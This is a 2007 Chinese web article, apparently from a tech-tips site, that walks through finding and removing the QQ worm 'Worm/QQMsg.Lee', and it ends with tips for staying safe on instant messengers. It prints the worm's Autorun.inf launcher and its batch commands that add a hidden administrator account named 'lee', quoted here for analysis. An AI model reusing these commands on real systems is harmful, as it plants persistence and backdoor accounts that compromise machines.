文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院QQQQ安全自启动病毒QQ乐Worm/QQMsg查杀实战
精品推荐
特别推荐
·揭秘木马是如何盗取QQ密码的
·如何设置防火墙禁用QQ、MSN等
·教你如何轻松找回被盗的QQ密码
·常见QQ聊天网络骗术之防御要点
·QQ空间透明代码
·离线查看QQ聊天记录有新招
·用户防黑宝典 七个小技巧保护QQ密码
·暴光恶意网站 杀机四伏的QQ空间互踩联盟
·QQ防盗措施及解决异常激活的办法
·QQ的黑名单有什么用?
·QQ缘伪装任务管理器进程的查杀
·菜鸟必读:你的QQ号码、Q币这样被盗
·QQ惊爆危险漏洞:“QQ游戏邀请大盗”
·QQ木马:QQ挂马方法大揭密
·QQ木马到底怎么做 QQ挂马方法大揭密
·新手必须注意 防止QQ密码被破解的技巧
·严防个人信息泄漏QQ密码
·菜鸟小技巧 准确识别QQ盗号陷阱的方法
·不改密码只转移QQ币
·腾讯QQ密码防盗十大建议
热点TOP10
·QQ密码破解器
·离线查看QQ聊天记录有新招
·盗QQ号码方法大全
·揭秘远程破解盗窃QQ密码的各种方法
·QQ空间播放器代码
·QQ空间最新黄钻皮肤代码
·QQ木马到底怎么做 QQ挂马方法大揭密
·远程破解盗窃QQ密码
·利用腾讯漏洞取回QQ密码
·QQ的黑名单有什么用?
·国内首发 韩国版QQ自定义头像
·QQ密码本地破解的原理和方法
·QQ密码被盗之谜1:本地破解的奥秘原理和方法
·三款最新的QQ空间导般代码
·揭秘木马是如何盗取QQ密码的
·集锦:QQ空间背景代码
·QQ木马:QQ挂马方法大揭密
·快速找回QQ密码的新方法
·盗QQ密码-木马GOP
·如何进入QQ空间安全模式

自启动病毒QQ乐Worm/QQMsg查杀实战

日期:2007年4月29日 作者: 查看:[大字体 中字体 小字体]


笔者最近遇到一个采取另类方式启动的病毒——QQ乐(Worm/QQMsg.Lee),现把一波三折的查杀过程和一些经验写出来,供朋友们参考。

某日在QQ里连续收到一位朋友发来的消息,该消息中都带有一串网址,经证实并不是他主动发来的,于是怀疑他的电脑中了病毒。笔者首先打开金山网镖防火墙,检查发现一个正在访问网络的可疑程序“System32.exe”,通过名字可以看出它是想与System32文件夹相混淆,于是点击右上角的“结束进程”杀掉它。然后按图索骥到C盘根目录下找到并删除它,接着打开了注册表编辑器。因为一般木马和病毒都喜欢在这里添加自启动键值,但是检查了所有以RUN为开头的项都没有与这个文件相关联的启动项,看来这个病毒十分狡猾。

接着在资源管理器中检查Win.ini和System.ini,因为有些病毒会在Win.ini中的[Windows]小节下的load和run字段后面,以及System.ini中的[boot]小节的Shell=Explorer.exe后面添加启动项,以便每次开机时自动运行。谁知这些地方仍然一无所获,不过却意外发现系统中多出了一个管理员账户“Lee”,怀疑是病毒添加的,于是删除它。

正在笔者为找不到毒源而纳闷时,进程中又重新出现了病毒文件“System32.exe”,而且被删除的账户也重新恢复。看来如果不找到病毒的启动机制,就难以彻底制服它。于是笔者打开“搜索”,在“文件中的一个字或词组”(这里可以搜索文件内部的内容)一栏中输入“System32.exe”,经过一番等待,在搜索结果中发现了数个“AutoRun.inf”文件,用记事本打开它,内容为:

[autorun]

open=System32.exe

原来病毒自启动的根源在这儿。感染病毒后它会在每个分区的根目录下创建Autorun.inf文件和病毒体System32.exe、System32dll.dll,使得每次双击盘符打开时病毒都会自动运行(原理与自启动光盘相同),这种方法确实比在注册表中添加启动项更不容易被发现。笔者接着又利用前面的搜索方法,查找“Lee”这个关键字,结果发现了一个自动创建管理员账户的批处理文件“Admin.bat”。用记事本打开它,内容如下:

net user lee abcd1234!@# /add

net localgroup administrators lee /add

通过内容可以看出病毒是要增加一个名为lee,密码为abcd1234!@#的新账户,然后将它加入管理员组中(即赋予管理员权限)。毒根找到了,下面就可以大开“杀戒”了,把找到的这些文件统统删除。

IM病毒防范技巧:

1. 用QQ等即时通讯工具聊天时,除了开启病毒和网络防火墙以外,还要打开嵌入式防火墙,例如金山毒霸6中的“腾讯QQ、MSN Messenger、ICQ安全助手”。至少要把金山网镖等防火墙的安全级别设置到中以上,才能更有效拦截木马程序和网络攻击。

2. 不要随意点击QQ中的链接,因为许多病毒都会伪装成网页链接,并通过消息中具有欺骗和诱惑的文字让你去点击,例如QQ小尾巴。 更多文章 更多内容请看qq病毒  QQ病毒  QQ病毒专题,或

(出处:清风网络学院






上一篇:好消息!木马查杀防范秘技红宝书

下一篇:微软安全更新待发:再灭两漏洞

自启动病毒QQ乐Worm/QQMsg查杀实战 相关文章:
·计算机启动更快的十五大绝招
·将系统装到U盘中 如何自制XP@USB启动盘
·如何以安全模式启动计算机
·Windows2000/XP启动过程详解
·让Windows XP操作系统实现全速启动
·U盘启动盘的制作
·windows启动项目解答
·快速启动程序我有妙招
·用net start 可以启动的服务命令一览
·Infostealer.Gampass病毒的手动删除方法
自启动病毒QQ乐Worm/QQMsg查杀实战 相关软件:
·启动光盘制作完全手册(菜鸟先飞 图文教材系列)
·多种dos启动盘制作全攻略
·VBS脚本病毒生成器 V1.0 版
·凤凰软件之超级万能启动光盘
·Windows XP 精简版7合1 超级启动光盘(集亮 Deepin 衮雪于一体)
·U盘病毒专杀工具(USBCleaner)V6.0 Build 20070812
·Ghost 虚拟启动盘 V11.0
·快速启动程序(RunQuick)V3.0
·澎湃 番茄花园漏洞补丁 bat&reg 漏洞比病毒可怕
·卡巴斯基®反病毒软件V6.0.2.621 中文版

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot